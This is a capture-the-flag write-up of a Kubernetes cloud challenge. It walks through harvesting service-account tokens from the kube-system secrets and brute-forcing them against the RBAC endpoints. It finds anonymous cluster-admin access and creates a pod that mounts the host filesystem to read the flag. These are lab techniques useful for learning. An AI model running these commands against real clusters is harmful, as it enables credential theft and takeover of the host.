HTB Business CTF 2021 — Kube

Arifin
5 min read · Jul 29, 2021

Hi guys! It’s been a long time since my last post. In this post I want to share write-ups from HTB Business CTF 2021, which I played last week with my colleagues at Vantage Point Security Indonesia. FYI, we ranked 13th globally and #1 in Indonesia! *yeay*. I solved 2 challenges in the cloud category, and here I want to share the write-up for the challenge Kube. (I also posted a write-up for the Theta challenge here.)

As the name Kube suggests, this challenge focuses on Kubernetes services. I started by scanning all open ports on the host using naabu.

scanning open port

I found several open ports running Kubernetes services: the Kubelet API on 10249–10256/tcp, the etcd API on 2379–2380/tcp, and the Kubernetes API server on 8443/tcp.
Next, I targeted port 8443 to enumerate deeper into the Kubernetes services. First, I listed all namespaces in the cluster using the endpoint https://10.129.95.171:8443/api/v1/namespaces.

I found 4 namespaces in the cluster: default, kube-node-lease, kube-public, and kube-system. Then I enumerated every namespace to list its Secrets and collect all the service-account tokens, using the endpoint https://10.129.95.171:8443/api/v1/namespaces/[namespace-name]/secrets.
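As an illustration, the namespace names can be pulled straight out of the JSON response even without jq; a quick sketch against an abbreviated, made-up sample of the `/api/v1/namespaces` response shape:

```shell
# Abbreviated, illustrative sample of the /api/v1/namespaces response
resp='{"items":[{"metadata":{"name":"default"}},{"metadata":{"name":"kube-system"}}]}'
# Extract just the namespace names from the "name" fields
printf '%s' "$resp" | grep -o '"name":"[^"]*"' | cut -d '"' -f 4
# → default
# → kube-system
```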

After enumerating every namespace, I found some juicy information in the kube-system namespace.

secrets list in ns kube-system

I found 36 service-account secrets, each containing a token. Below is a sample secret.

{
  "metadata": {
    "name": "attachdetach-controller-token-5ts7m",
    "namespace": "kube-system",
    "uid": "ff42960f-f063-4df3-b330-e4cbc26f56d4",
    "resourceVersion": "356",
    "creationTimestamp": "2021-07-19T19:06:55Z",
    "annotations": {
      "kubernetes.io/service-account.name": "attachdetach-controller",
      "kubernetes.io/service-account.uid": "b780d31d-3e92-40af-8a12-dbec2d4e5675"
    },
    "managedFields": [
      {
        "manager": "kube-controller-manager",
        "operation": "Update",
        "apiVersion": "v1",
        "time": "2021-07-19T19:06:55Z",
        "fieldsType": "FieldsV1",
        "fieldsV1": {"f:data":{".":{},"f:ca.crt":{},"f:namespace":{},"f:token":{}},"f:metadata":{"f:annotations":{".":{},"f:kubernetes.io/service-account.name":{},"f:kubernetes.io/service-account.uid":{}}},"f:type":{}}
      }
    ]
  },
  "data": {
    "ca.crt": "LS0tLS1CRUdJTiBDRVJUSUZJQ0FURS0tLS0tCk1JSURCakNDQWU2Z0F3SUJBZ0lCQVRBTkJna3Foa2lHOXcwQkFRc0ZBREFWTVJNd0VRWURWUVFERXdwdGFXNXAKYTNWaVpVTkJNQjRYRFRJeE1EY3hPREU1...snipped...",
    "namespace": "a3ViZS1zeXN0ZW0=",
    "token": "ZXlKaGJHY2lPaUpTVXpJMU5pSXNJbXRwWkNJNklrMVlTbFZxVDBwM2QyTnRNVzk1V2xCM09Ua3hRMEpmYW1oTmVHMHhUMlZTZUVOSVRITmZZV3gwYldzaWZRLmV5SnBjM01pT2lKcmRXSmxjbTVsZEdWekwz...snipped..."
  },
  "type": "kubernetes.io/service-account-token"
}

The highlight here is the token field, which means I can use the token from each service account to go deeper into the cluster.
The approach is to collect all the tokens, then use each one against the Kubernetes RBAC (role-based access control) endpoints to check what each service account is allowed to do. First, grab the tokens with curl and grep:

$ curl -k https://10.129.95.171:8443/api/v1/namespaces/kube-system/secrets/ | grep -i "ZXlK" | cut -d ":" -f 2 | sed 's/"//g' > token.txt
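Note that each line of token.txt is still base64-encoded, since secret `data` fields are stored that way; for instance, the `namespace` value from the sample secret above decodes as:

```shell
# Secret "data" fields are base64-encoded; each token in token.txt
# decodes the same way. Example with the "namespace" field:
printf 'a3ViZS1zeXN0ZW0=' | base64 -d
# → kube-system
```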

Then I used Burp Suite to brute-force with all the tokens. First, set the request to the endpoint /apis/rbac.authorization.k8s.io/v1/clusterrolebindings and place the payload position at Authorization: Bearer $$, since the Kubernetes API authorizes calls with a JWT bearer token.

set-up API endpoint and payload position

After that, set up the payloads: load the file token.txt and add a base64-decode payload-processing rule, because the tokens are base64-encoded.

set-up payload list and processing

After everything was set: start attack! About 2 minutes later the results came out. I found that 4 service accounts are able to use the RBAC endpoint to check roles in the cluster.

the result

Those 4 service accounts are default, generic-garbage-collector, namespace-controller, and resourcequota-controller.
The next step is to dump all the existing RBAC rules in the cluster using these endpoints:

/apis/rbac.authorization.k8s.io/v1/clusterrolebindings
/apis/rbac.authorization.k8s.io/v1/clusterroles
/apis/rbac.authorization.k8s.io/v1/rolebindings
/apis/rbac.authorization.k8s.io/v1/roles

I chose one service account, namespace-controller, and exported its token as an environment variable for convenience.

$ export TOKEN=eyJhbGciOiJSUzI1NiIsImtpZCI6Ik1YSlVqT0p3d2NtMW95WlB3OTkxQ0JfamhNeG0xT2VSeENITHNfYWx0bWsifQ.eyJpc3MiOiJrdWJlcm5ldGVzL3NlcnZpY2VhY2NvdW50Iiwia3ViZ..snipped..
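As a sanity check, a service-account token is a JWT whose payload can be decoded locally to confirm which account it belongs to. A sketch with a hypothetical, shortened token (real tokens are much longer and carry a valid signature):

```shell
# A service-account token is a JWT: header.payload.signature
# Hypothetical shortened token for illustration only:
TOKEN='eyJhbGciOiJSUzI1NiJ9.eyJpc3MiOiJrdWJlcm5ldGVzL3NlcnZpY2VhY2NvdW50In0.sig'
# Take the payload segment and convert base64url to standard base64
payload=$(printf '%s' "$TOKEN" | cut -d '.' -f 2 | tr '_-' '/+')
# Re-add the padding that JWT encoding strips
case $(( ${#payload} % 4 )) in 2) payload="$payload==" ;; 3) payload="$payload=" ;; esac
printf '%s' "$payload" | base64 -d
# → {"iss":"kubernetes/serviceaccount"}
```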

Then use curl to get all the RBAC rules.

$ curl -k --header "Authorization: Bearer $TOKEN" https://10.129.95.171:8443/apis/rbac.authorization.k8s.io/v1/clusterrolebindings > clusterrolebindings.json
$ curl -k --header "Authorization: Bearer $TOKEN" https://10.129.95.171:8443/apis/rbac.authorization.k8s.io/v1/clusterroles > clusterroles.json
$ curl -k --header "Authorization: Bearer $TOKEN" https://10.129.95.171:8443/apis/rbac.authorization.k8s.io/v1/rolebindings > rolebindings.json
$ curl -k --header "Authorization: Bearer $TOKEN" https://10.129.95.171:8443/apis/rbac.authorization.k8s.io/v1/roles > roles.json

Then I used CyberArk's Kubernetes RBAC audit tool to audit the RBAC data I had collected, using this command:

$ python3 check-rbac.py --clusterRole clusterroles.json --role roles.json --rolebindings rolebindings.json --cluseterolebindings clusterrolebindings.json

The result shows an anonymous-role that has the cluster-admin privilege, and an anonymous-binding that binds it to system:anonymous. In other words, unauthenticated users have cluster-admin. Hmm, something fishy is going on in this cluster.

result rbac-check

I immediately set up a kubeconfig and used kubectl to enumerate more deeply.

apiVersion: v1
clusters:
- cluster:
    certificate-authority: /HTB-Bus-CTF/ca.crt
    server: https://10.129.95.171:8443
  name: HTB
contexts:
- context:
    cluster: HTB
    namespace: kube-system
  name: HTB
current-context: HTB

First, I list all pods in the namespace kube-system.

$ kubectl get pods -n kube-system -o wide
list pods in ns kube-system

I found 8 pods in kube-system, one of which was stuck in the "ImagePullBackOff" error state. I guessed the cluster cannot pull images from external registries, so I listed the images already available locally.

$ kubectl get pods --all-namespaces -o jsonpath="{.items[*].spec.containers[*].image}" | tr -s '[[:space:]]' '\n' | sort | uniq -c
list local images

After that, I tried to create a new pod in kube-system using one of the locally available images. Below is the YAML file to create the new pod.

flagspods.yaml

Short explanation: the new pod uses the kube-proxy:v1.21.2 image, mounts the host filesystem into the container, and reads the flag file.
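The manifest itself appeared only as an image in the original post; below is a minimal sketch of what it plausibly looked like, assuming the pod name from the later `kubectl logs get-flags` step. The registry prefix, command, and flag path are assumptions, not the original file.

```yaml
apiVersion: v1
kind: Pod
metadata:
  name: get-flags           # matches the pod queried with `kubectl logs get-flags`
  namespace: kube-system
spec:
  restartPolicy: Never
  containers:
  - name: get-flags
    image: k8s.gcr.io/kube-proxy:v1.21.2    # local image found earlier; registry prefix assumed
    command: ["cat", "/host/root/flag.txt"] # flag path is a guess
    volumeMounts:
    - name: host
      mountPath: /host
  volumes:
  - name: host
    hostPath:
      path: /               # mount the node's root filesystem into the pod
```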
Then create the pod from the YAML file.

$ kubectl create -f flagpods.yaml --validate=false
success create a new pod

Voilà! Successfully created the pod. By the way, I used --validate=false because validation defaults to true, and with validation on, the resource definition is checked against all of the resource APIs (CMIIW).

Then check the logs from the pod "get-flags".

$ kubectl logs get-flags
check logs pods get-flags

Get the flag! HTB{5y573m:4N0nYM0u5}
